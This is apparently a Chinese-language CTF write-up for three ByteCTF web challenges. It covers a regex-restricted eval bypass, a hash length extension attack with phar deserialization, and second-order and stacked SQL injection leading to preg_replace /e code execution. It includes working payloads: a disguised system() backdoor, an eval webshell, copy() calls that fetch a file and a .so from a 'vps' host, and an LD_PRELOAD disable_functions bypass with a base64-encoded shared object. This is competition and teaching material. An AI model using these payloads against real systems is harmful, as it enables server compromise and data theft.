bytectf writeup

boring code(绕正则)

在index.php中

// index.php
<!-- flag in this file and code in /code -->
// /code
<?php
function is_valid_url($url) {
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        if (preg_match('/data:\/\//i', $url)) {
            return false;
        }
        return true;
    }
    return false;
}

if (isset($_POST['url'])){
    $url = $_POST['url'];
    if (is_valid_url($url)) {
        $r = parse_url($url);
        if (preg_match('/baidu\.com$/', $r['host'])) {
            $code = file_get_contents($url);
            if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
                if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }
            }
        } else {
            echo "error: host not allowed";
        }
    } else {
        echo "error: invalid url";
    }
}else{
    highlight_file(__FILE__);
}
?>

flag在index.php中

code里先过滤了data函数

要满足url参数的后缀的baidu.com结尾

code参数满足正则 类似xxx(xxx(xxx()))这种格式

看一下可用函数

<?php
$arr = get_defined_functions()['internal'];

foreach ($arr as $key => $value) {
    if ( preg_match('/_/', $value) ){
        unset($arr[$key]);
        continue;
    }

if (                     preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $value) ){
        unset($arr[$key]);
        continue;
    }
}
foreach ($arr as $key => $value) {
    echo $value."()<br>";
}

这些函数中能操作目录的有

rmdir mkdir opendir closedir chdir rewinddir readdir dir scandir

可以通过chr(time())构造 ‘.’字符

chr(46) chr(302) chr(558)的值都为.

next(scandir(chr(time())))可以得到 ‘..’字符

chdir(‘..’)没有地方放,time的函数参数是void,就放在time(void)里也没有影响

end(scandir(chr(time())))可以得到网站根目录下的index.php

最后payload如下,最多打256次

readfile(end(scandir(chr(time(chdir(next(scandir(chr(time())))))))));

exp

import requests
import time
url="http://localhost/code/"
s=requests.Session()
payload={"url":"http://xxx"}

for i in range(400):
    time.sleep(0.7)
    print(i)
    r=s.post(url,data=payload)
    if "flag" in r.text:
        print (r.text)

第一层用百度贴吧,百度网盘

或者compress.zlib://data:@baidu.com/;base64,Pmxz");

Data URI scheme 的语法

data:①[<mime type>]②[;charset=<charset>]③[;<encoding>]④,<encoded data>⑤

第①部分data: 协议头,它标识这个内容为一个 data URI 资源。

第②部分[<mime type>](可选项):浏览器通常使用MIME类型(而不是文件扩展名)来确定如何处理文档;因此服务器设置正确以将正确的MIME类型附加到响应对象的头部是非常重要的。MIME类型对大小写不敏感,但是传统写法都是小写。

例如:text/plain,image/jpeg

第③部分 *[;charset=<charset>] *(可选项):源文本的字符集编码方式,默认编码是 charset=US-ASCII, 即数据部分的每个字符都会自动编码为 %xx

第④部分[;<encoding>] *: *数据编码方式(默认US-ASCII,BASE64两种)

第⑤部分,<encoded data> 编码后的数据

baidu.com/代替的是data协议中的mine类型

备注

vim编辑后保存会自动在结尾加上换行符

需要设置成二进制文件格式

:set binary
:set noendofline
:wq

##ezcms(phar反序列化)

扫目录www.zip,查看源码

####1.hash拓展攻击

//config.php
function login(){
    $secret = "********";
    setcookie("hash", md5($secret."adminadmin"));
    return 1;
}

exp

import hashpumpy

signature="52107b08c0f3342d2153ae1d68e6262c"
original_data="admin"
add_data="admin"
key_length=8+5
hash=hashpumpy.hashpump(signature,original_data,add_data,key_length)
print (hash)
admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00admin

'7e6270e35bf7b74982d8fff6382b5048'

用账号admin 密码%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00admin 设置cookies[‘user’]=7e6270e35bf7b74982d8fff6382b5048 可以上传文件

####2.上传后门文件

<?php
$a="syste";
$b="m";
$c=$a.$b;
$d=$c($_REQUEST['a']);
?>

3.触发反序列化

来自suctf

finfo_file / finfo_buffer / mime_content_type

均通过_php_finfo_get_type间接调用了关键函数php_stream_open_wrapper_ex,导致均可以使用phar://触发 phar 反序列化,所以这里我选择了finfo_file作为 phar 反序列化的触发函数。

三个函数在 fileinfo.c 599 行中 通过 _php_finfo_get_type 定义,在 552 行中 _php_finfo_get_types 调用了 php_stream_open_wrapper_ex

payload

<?php

class File{
    public $checker;
    function __construct(){
        $this->checker = new Profile();
    }
}

class Profile{
    public $admin;
    function __construct() {
        $this->admin = new ZipArchive;
        $this->username = '/var/www/html/sandbox/9931f06e1af1fd77c1e95e84443dd6f6/.htaccess';
        $this->password = ZIPARCHIVE::OVERWRITE;
    }
}

$o = new File();

@unlink("test.phar");
$phar = new Phar("test.phar"); 
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');   

$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件,可忽略
//签名自动计算
$phar->stopBuffering();
?>

####4.绕过phar开头限制

使用php://filter协议

filepath=php://filter/resource=phar://sandbox/a87136ce5a8b85871f1d0b6b2add38d2/dd7ec931179c4dcb6a8ffb8b8786d20b.txt

5.使用内置类ZipArchive的open函数删除.htaccess文件

查看文档ZipArchive::open ( filename ,flags )有两个参数

flags参数为ZIPARCHIVE::OVERWRITE (integer)

总是以一个新的压缩包开始,此模式下如果已经存在则会被覆盖。

可以open(‘.htaccess’,ZIPARCHIVE::OVERWRITE)删除.htaccess

babyblog(堆叠注入 LD_PRELOAD bypassDF)

下载源码www.zip

//edit.php
if(isset($_POST['title']) && isset($_POST['content']) && isset($_POST['id'])){
    foreach($sql->query("select * from article where id=" . intval($_POST['id']) . ";") as $v){
        $row = $v;
    }
    if($_SESSION['id'] == $row['userid']){
        $title = addslashes($_POST['title']);
        $content = addslashes($_POST['content']);
        $sql->query("update article set title='$title',content='$content' where title='" . $row['title'] . "';");
        exit("<script>alert('Edited successfully.');location.href='index.php';</script>");
    }else{
        exit("<script>alert('You do not have permission.');history.go(-1);</script>");
    }
}

在edit.php,$row['title']的来源是数据库。在writing.php 插入的时候,使用addslashes转义了title的内容但是在上面未经任何处理又直接取出来会导致二次注入,例如第一次插入'1,经过addlashes转义,sql 语句变成

insert into article (userid,title,content) values ("1", '\'1','1');"

但是插入数据库的内容是'1,取出来的时候也是'1,这就导致了注入。

所以我们可以利用这个点进行注入,update 我们的 isvip 字段就行

';update users set isvip=1 where username='hh';

在config.php中的SafeFilter函数,可以通过堆叠绕过

payload="update users set isvip=1 where username='hh';"
print payload.encode("hex")
//757064617465207573657273207365742069737669703d3120776865726520757365726e616d653d276868273b
';set @t=0x757064617465207573657273207365742069737669703d3120776865726520757365726e616d653d276868273b;prepare x from @t;execute x;

在writing中把payload写进title里,再edit中提交一次就可以触发注入

成为vip后进入replace.php页面

$content = addslashes(preg_replace("/" . $_POST['find'] . "/", $_POST['replace'], $row['content']));

在PHP5.5以下的版本中,/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码

/e再加%00截断后面多余的字符

find=/e%00&replace=phpinfo();&regex=1&id=2
//看一下disable function
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,ini_set,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail    

可以写文件

//写webshell.php
find=/e%00&replace=file_put_contents('/var/www/html/webshell.php','<?php eval($_POST[a]);');&regex=1&id=2

//用webshell写其他文件
copy("http://vps/1.txt", "/var/www/html/webshell.php");
echo copy("http://vps/hack.so","hack.so");

有basedir的限制,通过opendir和readdir列目录,读到了flag和readflag,需要命令执行

//在webshell执行命令
if ($dh = opendir("glob:///*")) {
    while (($file = readdir($dh)) !== false) {
        echo "$file\n";
    }
    closedir($dh);
}

利用webshell.php 执行以下命令 写 hack.php 和 hack.so

file_put_contents('/var/www/html/hack.php','<?php putenv("LD_PRELOAD=./hack.so"); putenv("_evilcmd=".$_REQUEST["a"]." >/tmp/res"); if (function_exists("error_log")){error_log("", 1, "example@example.com");echo "error_log";} elseif (function_exists("mail")){ mail("", "", "", "");echo "mail";} elseif (function_exists("mb_send_mail")){mb_send_mail("","",""); echo "mb_send_mail";  } elseif ((function_exists("imap_mail"))){ imap_mail("","",""); echo "imap_mail"; } else { echo "fail";  } echo "  ".file_get_contents("/tmp/res");?>');
file_put_contents%28%22%2Fvar%2Fwww%2Fhtml%2Fhack.so%22%2Cbase64_decode%28%22f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAgAYAAAAAAABAAAAAAAAAAAgZAAAAAAAAAAAAAEAAOAAHAEAAHQAaAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnAgAAAAAAACcCAAAAAAAAAAAIAAAAAAAAQAAAAYAAAAADgAAAAAAAAAOIAAAAAAAAA4gAAAAAABAAgAAAAAAAEgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAADwBwAAAAAAAPAHAAAAAAAA8AcAAAAAAAAkAAAAAAAAACQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAAAA4AAAAAAAAADiAAAAAAAAAOIAAAAAAAAAIAAAAAAAAAAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VABV%2FzjY58tz%2Flyy0JwI35hHfs%2BOoAAAAAAMAAAAKAAAAAQAAAAYAAACIyCABgBRACQoAAAAMAAAADgAAAEJF1ey745J82HFYHLmN8Q7q0%2B8O7JJz8M9JSZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAJAPgFAAAAAAAAAAAAAAAAAAB9AAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAcAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACEAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAABAAAAIAAAAAAAAAAAAAAAAAAAAAAAAABhAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACTAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAIAAAAAAAAAAAAAAAAAAAAAAAAABSAAAAIgAAAAAAAAAAAAAAAAAAAAAAAACmAAAAEAAXAEAQIAAAAAAAAAAAAAAAAAC5AAAAEAAYAEgQIAAAAAAAAAAAAAAAAACtAAAAEAAYAEAQIAAAAAAAAAAAAAAAAAAQAAAAEgAJAPgFAAAAAAAAAAAAAAAAAAAWAAAAEgANANAHAAAAAAAAAAAAAAAAAACLAAAAEgAMAJsHAAAAAAAANAAAAAAAAAB1AAAAEgAMAIAHAAAAAAAAGwAAAAAAAAAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBwYXlsb2FkAGdldGVudgBzeXN0ZW0AZ2V0ZXVpZAB1bnNldGVudgBsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4yLjUAAAAAAAIAAAACAAAAAAACAAAAAgABAAEAAQABAAEAAQABAAAAAAABAAEAnAAAABAAAAAAAAAAdRppCQAAAgC%2BAAAAAAAAAAAOIAAAAAAACAAAAAAAAABQBwAAAAAAAAgOIAAAAAAACAAAAAAAAAAQBwAAAAAAADgQIAAAAAAACAAAAAAAAAA4ECAAAAAAANgPIAAAAAAABgAAAAMAAAAAAAAAAAAAAOAPIAAAAAAABgAAAAUAAAAAAAAAAAAAAOgPIAAAAAAABgAAAAYAAAAAAAAAAAAAAPAPIAAAAAAABgAAAAgAAAAAAAAAAAAAAPgPIAAAAAAABgAAAAkAAAAAAAAAAAAAABgQIAAAAAAABwAAAAIAAAAAAAAAAAAAACAQIAAAAAAABwAAAAQAAAAAAAAAAAAAACgQIAAAAAAABwAAABAAAAAAAAAAAAAAADAQIAAAAAAABwAAAAcAAAAAAAAAAAAAAEiD7AhIiwXdCSAASIXAdAXoYwAAAEiDxAjDAAAAAAAAAAAAAAAAAAD%2FNeIJIAD%2FJeQJIAAPH0AA%2FyXiCSAAaAAAAADp4P%2F%2F%2F%2F8l2gkgAGgBAAAA6dD%2F%2F%2F%2F%2FJdIJIABoAgAAAOnA%2F%2F%2F%2F%2FyXKCSAAaAMAAADpsP%2F%2F%2F%2F8lagkgAGaQ%2FyV6CSAAZpBIjT25CSAASI0FuQkgAFVIKfhIieVIg%2FgOdhVIiwU2CSAASIXAdAld%2F%2BBmDx9EAABdww8fQABmLg8fhAAAAAAASI09eQkgAEiNNXIJIABVSCn%2BSInlSMH%2BA0iJ8EjB6D9IAcZI0f50GEiLBQEJIABIhcB0DF3%2F4GYPH4QAAAAAAF3DDx9AAGYuDx%2BEAAAAAACAPSkJIAAAdSdIgz3XCCAAAFVIieV0DEiLPQoJIADoRf%2F%2F%2F%2BhI%2F%2F%2F%2FXcYFAAkgAAHzww8fQABmLg8fhAAAAAAASI09uQYgAEiDPwB1C%2Ble%2F%2F%2F%2FZg8fRAAASIsFeQggAEiFwHTpVUiJ5f%2FQXelA%2F%2F%2F%2FVUiJ5UiNPU4AAADooP7%2F%2F0iJx%2Bio%2Fv%2F%2FkF3DVUiJ5UiNPTwAAADohf7%2F%2F0iFwHUHuAAAAADrFkiNPSQAAADonf7%2F%2F7gAAAAA6IP%2B%2F%2F9dwwBIg%2BwISIPECMNfZXZpbGNtZABMRF9QUkVMT0FEAAAAAAEbAzskAAAAAwAAADD%2B%2F%2F9AAAAAkP%2F%2F%2F2gAAACr%2F%2F%2F%2FiAAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAOj9%2F%2F9QAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAHAAAAEQAAAAg%2F%2F%2F%2FGwAAAABBDhCGAkMNBlYMBwgAAAAcAAAAZAAAABv%2F%2F%2F80AAAAAEEOEIYCQw0GbwwHCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQBwAAAAAAABAHAAAAAAAAAAAAAAAAAAABAAAAAAAAAJwAAAAAAAAADAAAAAAAAAD4BQAAAAAAAA0AAAAAAAAA0AcAAAAAAAAZAAAAAAAAAAAOIAAAAAAAGwAAAAAAAAAIAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7%2FbwAAAADwAQAAAAAAAAUAAAAAAAAAyAMAAAAAAAAGAAAAAAAAADACAAAAAAAACgAAAAAAAADKAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAABgAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAJgFAAAAAAAABwAAAAAAAADYBAAAAAAAAAgAAAAAAAAAwAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA%2Fv%2F%2FbwAAAAC4BAAAAAAAAP%2F%2F%2F28AAAAAAQAAAAAAAADw%2F%2F9vAAAAAJIEAAAAAAAA%2Bf%2F%2FbwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAADYGAAAAAAAARgYAAAAAAABWBgAAAAAAAGYGAAAAAAAAOBAgAAAAAABHQ0M6IChVYnVudHUgNS40LjAtNnVidW50dTF%2BMTYuMDQuMTEpIDUuNC4wIDIwMTYwNjA5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEAyAEAAAAAAAAAAAAAAAAAAAAAAAADAAIA8AEAAAAAAAAAAAAAAAAAAAAAAAADAAMAMAIAAAAAAAAAAAAAAAAAAAAAAAADAAQAyAMAAAAAAAAAAAAAAAAAAAAAAAADAAUAkgQAAAAAAAAAAAAAAAAAAAAAAAADAAYAuAQAAAAAAAAAAAAAAAAAAAAAAAADAAcA2AQAAAAAAAAAAAAAAAAAAAAAAAADAAgAmAUAAAAAAAAAAAAAAAAAAAAAAAADAAkA%2BAUAAAAAAAAAAAAAAAAAAAAAAAADAAoAIAYAAAAAAAAAAAAAAAAAAAAAAAADAAsAcAYAAAAAAAAAAAAAAAAAAAAAAAADAAwAgAYAAAAAAAAAAAAAAAAAAAAAAAADAA0A0AcAAAAAAAAAAAAAAAAAAAAAAAADAA4A2QcAAAAAAAAAAAAAAAAAAAAAAAADAA8A8AcAAAAAAAAAAAAAAAAAAAAAAAADABAAGAgAAAAAAAAAAAAAAAAAAAAAAAADABEAAA4gAAAAAAAAAAAAAAAAAAAAAAADABIACA4gAAAAAAAAAAAAAAAAAAAAAAADABMAEA4gAAAAAAAAAAAAAAAAAAAAAAADABQAGA4gAAAAAAAAAAAAAAAAAAAAAAADABUA2A8gAAAAAAAAAAAAAAAAAAAAAAADABYAABAgAAAAAAAAAAAAAAAAAAAAAAADABcAOBAgAAAAAAAAAAAAAAAAAAAAAAADABgAQBAgAAAAAAAAAAAAAAAAAAAAAAADABkAAAAAAAAAAAAAAAAAAAAAAAEAAAAEAPH%2FAAAAAAAAAAAAAAAAAAAAAAwAAAABABMAEA4gAAAAAAAAAAAAAAAAABkAAAACAAwAgAYAAAAAAAAAAAAAAAAAABsAAAACAAwAwAYAAAAAAAAAAAAAAAAAAC4AAAACAAwAEAcAAAAAAAAAAAAAAAAAAEQAAAABABgAQBAgAAAAAAABAAAAAAAAAFMAAAABABIACA4gAAAAAAAAAAAAAAAAAHoAAAACAAwAUAcAAAAAAAAAAAAAAAAAAIYAAAABABEAAA4gAAAAAAAAAAAAAAAAAKUAAAAEAPH%2FAAAAAAAAAAAAAAAAAAAAAAEAAAAEAPH%2FAAAAAAAAAAAAAAAAAAAAAKwAAAABABAAmAgAAAAAAAAAAAAAAAAAALoAAAABABMAEA4gAAAAAAAAAAAAAAAAAAAAAAAEAPH%2FAAAAAAAAAAAAAAAAAAAAAMYAAAABABcAOBAgAAAAAAAAAAAAAAAAANMAAAABABQAGA4gAAAAAAAAAAAAAAAAANwAAAAAAA8A8AcAAAAAAAAAAAAAAAAAAO8AAAABABcAQBAgAAAAAAAAAAAAAAAAAPsAAAABABYAABAgAAAAAAAAAAAAAAAAABEBAAASAAAAAAAAAAAAAAAAAAAAAAAAACUBAAAgAAAAAAAAAAAAAAAAAAAAAAAAAEEBAAAQABcAQBAgAAAAAAAAAAAAAAAAAEgBAAASAA0A0AcAAAAAAAAAAAAAAAAAAE4BAAASAAAAAAAAAAAAAAAAAAAAAAAAAGIBAAAgAAAAAAAAAAAAAAAAAAAAAAAAAHEBAAASAAwAmwcAAAAAAAA0AAAAAAAAAHkBAAASAAwAgAcAAAAAAAAbAAAAAAAAAIEBAAAQABgASBAgAAAAAAAAAAAAAAAAAIYBAAAQABgAQBAgAAAAAAAAAAAAAAAAAJIBAAAgAAAAAAAAAAAAAAAAAAAAAAAAAKYBAAASAAAAAAAAAAAAAAAAAAAAAAAAALwBAAAgAAAAAAAAAAAAAAAAAAAAAAAAANYBAAAiAAAAAAAAAAAAAAAAAAAAAAAAAPIBAAASAAkA%2BAUAAAAAAAAAAAAAAAAAAABjcnRzdHVmZi5jAF9fSkNSX0xJU1RfXwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc1OTQAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AGhhY2suYwBfX0ZSQU1FX0VORF9fAF9fSkNSX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUNfRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAGdldGVudkBAR0xJQkNfMi4yLjUAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF9lZGF0YQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAGdldGV1aWQAcGF5bG9hZABfZW5kAF9fYnNzX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMAdW5zZXRlbnZAQEdMSUJDXzIuMi41AF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AF9pbml0AAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5ub3RlLmdudS5idWlsZC1pZAAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsYS5keW4ALnJlbGEucGx0AC5pbml0AC5wbHQuZ290AC50ZXh0AC5maW5pAC5yb2RhdGEALmVoX2ZyYW1lX2hkcgAuZWhfZnJhbWUALmluaXRfYXJyYXkALmZpbmlfYXJyYXkALmpjcgAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v%2F%2FbwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAAEAAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAADACAAAAAAAAMAIAAAAAAACYAQAAAAAAAAQAAAACAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAADIAwAAAAAAAMgDAAAAAAAAygAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA%2F%2F%2F%2FbwIAAAAAAAAAkgQAAAAAAACSBAAAAAAAACIAAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7%2F%2F28CAAAAAAAAALgEAAAAAAAAuAQAAAAAAAAgAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAADYBAAAAAAAANgEAAAAAAAAwAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAmAUAAAAAAACYBQAAAAAAAGAAAAAAAAAAAwAAABYAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAAPgFAAAAAAAA%2BAUAAAAAAAAaAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAAAgBgAAAAAAACAGAAAAAAAAUAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB%2BAAAAAQAAAAYAAAAAAAAAcAYAAAAAAABwBgAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAhwAAAAEAAAAGAAAAAAAAAIAGAAAAAAAAgAYAAAAAAABPAQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAI0AAAABAAAABgAAAAAAAADQBwAAAAAAANAHAAAAAAAACQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACTAAAAAQAAAAIAAAAAAAAA2QcAAAAAAADZBwAAAAAAABQAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAmwAAAAEAAAACAAAAAAAAAPAHAAAAAAAA8AcAAAAAAAAkAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAKkAAAABAAAAAgAAAAAAAAAYCAAAAAAAABgIAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACzAAAADgAAAAMAAAAAAAAAAA4gAAAAAAAADgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAvwAAAA8AAAADAAAAAAAAAAgOIAAAAAAACA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAMsAAAABAAAAAwAAAAAAAAAQDiAAAAAAABAOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADQAAAABgAAAAMAAAAAAAAAGA4gAAAAAAAYDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAANgPIAAAAAAA2A8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANkAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADiAAAAAQAAAAMAAAAAAAAAOBAgAAAAAAA4EAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA6AAAAAgAAAADAAAAAAAAAEAQIAAAAAAAQBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAQAAA